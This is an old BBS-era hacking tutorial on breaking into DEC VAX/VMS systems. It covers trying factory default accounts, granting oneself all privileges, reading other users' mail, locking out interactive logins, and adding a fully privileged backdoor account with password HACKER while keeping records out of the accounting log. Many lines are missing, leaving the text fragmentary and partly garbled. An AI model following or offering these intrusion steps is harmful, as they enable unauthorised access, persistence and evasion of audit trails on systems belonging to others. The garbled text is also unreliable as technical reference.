Unauthorised Access UK 0636-708063 10pm-7am 12oo/24oo
HACKING VAX'S VMS
The VAX is made by DEC (Digital Equipment Corp) and can run a variety
of operating systems. In this file i will talk about the VMS (Virtual
Memory Operating System), VMS also runs on the PDP-11, both mainframes
are 32 bit machines with 32 bit virtual address space.
When you first connect to a VAX you type either a return, a ctrl-c or
a ctrl-y. It will then respond with something similar to this:
The most frequent way of gaining access to a computer is by using a
'default' password, this by the way is not very successful.......
When DEC sells a VAX/VMS, the system comes equipped with 4 accounts
DEFAULT : This serves as a template in creating user records in the
UAF (User Authorization File). A new user record is assigned
the values of the default record except where the system
manager changes those values. The default record can be
modified but can not be deleted from the UAF.....
SYSTEM : Provides a means for the system manager to log in with full
privileges. The SYSTEM record can be modified but cannot be
deleted from the UAF.......
FIELD : Permits DIGITAL field service personnel to check out a new
system. The FIELD record can be deleted once the system is
SYSTEST: Provides an appropriate environment for running the User
Environment Test Package (UETP). The SYSTEST record can be
deleted once the system is installed.
Usually the SYSTEM MANAGER adds,deletes, and modifies these records
SYSTEM MANAGER or OPERATOR
FIELD SERVICE or TEST
DEFAULT USER or DEFAULT
SYSTEST UETP or SYSTEST
Other typical VMS accounts are :
Or a combination of the various usernames and passwords. If none of
these get you in , then you should try another system unless you have
away of getting an account either by trashing or other means.....
You will know that you are in by receiving the prompt of a dollar sign
($). You will be popped into the default directory which is dependent
on what account you logged in as. If you get in as system manager
(highly unlikely) you have full access....
access, but you may have the privileges to give your self full access.
To give privs to yourself:
$ SET PROCESS/PRIVS=ALL
The VMS system has full help files available by typing HELP. You can
use the wildcard character of an '*' to list out info on every
$ help *
When you first logon, it may be to your advantage to get a list of all
users currently logged onto the system if there are any at all. You
can do this by:
$ SHOW USERS
VAX/VMS Interactive Users-Total=4
TTD2: FIELD 004E02FF
TTD1: SYSMAN 0043552E
TXB3 TRTRTRRTR 01190057
there are people logged in, especially the system manager or the
account you are logged on as appears twice.. log out straight away,
and call back later. You do not want to call to late though as the
To communicate with other users or other hackers that are on the
$ PHONE Username
$ SHOW NETWORK
This will invoke the Personal Mail Utility, you can then either read
your mail or select help....
To see what you have in your directory type:
To get a list of directories on the system type:
$ DIR *.*
When a VAX/VMS is first installed, it comes with 9 directories which
are not listed when you execute the DIR *.* command:
This directory contains various macro and object libraries.
This directory contains files used in managing the operating system.
This directory contains text files and help libraries for the HELP
This is the directory for the error log file (ERRLOG.SYS).
This directory contains files used in testing the functions of the
This directory contains system diagnostic programs.
This directory contains filesused in applying system updates.
This directory contains sample driver programs, user-written system
This directory contains the executable images of most of the functions
of the operating system.
File-Type: Description: command:
.hlp system help file TYPE filename
.dat data file TYPE filename
.msg message file TYPE filename
.doc Documentation TYPE filename
.log LOG file TYPE filename
.err ERROR msg file TYPE filename
.seq sequential file TYPE filename
.sys system file FILE-NAME
.exe executable file FILE-NAME
.com command file COMMAND NAME
.bas basic file RUN file-name
.txt ascii text file TYPE filename
There are others but you won't see them as much as the above. You can
change the directories either by using the CHANGE command or by using
the SET DEFAULT command:
$ SET DEFAULT
You can now list and execute the files in this directory without first
the directory name followed by the filename as long as you have
view files within directories that you cannot default to by:
$ TYPE LOD.MAI;1
This will list the contents of the file LOD.MAI;1 in the directory of
The use of wildcards is very helpful when you desire to view all the
mail or something on the system. To list out all the users mail if you
As you may have noticed mail files have the extension of MAI at the
end. The ;1 or ;2 etc are used to number files with the same name.
user possessing them could cause to the system:
NONE - No privileges
NORMAL - minimum privileges to use the system.
GROUP - Potential to interfere with members of the same group.
DEVOUR - Potential to devour noncritical system-wide resources.
SYSTEM - Potential to interfere with normal system operation.
FILE - Potential to comprimise file security.
ALL - Potential to control the system (wouldn't that be good ahah).
The User Authorization File contains the names of the users who may
log into the system and also contains a record of the users
and a member number.
names for file access.
automatically at login time.
the ctrl-y functions and lock user passwords.
by the user at login time.
and modify records in the UAF.
The AUTHORIZE Utility allows you to modify the information in the UAF.
The commands for AUTHORIZE are:
ADD Username Adds a record to the UAF.
EXIT (or CTRL-Z) Returns you to command level.
HELP Lists the AUTHORIZE commands.
LIST Creates a listing file of UAF records.
MODIFY Username Modifies a record.
REMOVE Username deletes a record.
SHOW Displays UAF records.
The most useful besides ADD is the SHOW command. SHOW displays reports
for selected UAF records. YOU can get a /BRIEF listing of a /FULL
listing. BUT before you do that, you may want to make sure no one is
logged on besides you,to make sure know one can log on type the
$ SET LOGINS /INTERACTIVE=0
This establishes the max number of users able to log in to the system,
this command does not affect users currently logged on.
To list out the userfile do the following:
$ SET DEFAULT
$ RUN AUTHORIZE
UAF> SHOW * /BRIEF
Unfortunately you cannot get a listing of passwords,though you can get
a listing of all the users as shown above... The passwords are
encrypted just like the unix systems.
UAF> ADD /PASSWORD=HACKER /UIC=<014,006> /CPUTIME=0
/DEVICE=SYS$ROOT_/ACCOUNT=VMS /DIRECTORY= /PRIVS=ALL
COMMAND ENCLOSED IN BRACKETS....
OTHER DEVICES ARE SYS$DEVICE,SYS$SYSDISK ETC..
RECORDS,THUS NOT ADDING INFORMATION TO THE ACCOUNTING.DAT FILE.
This file was written by Terry Gilligan if you want any more info on
the vax contact me, i will help you as much as i can.. have lots more
nfo on vax security if anyone is interested..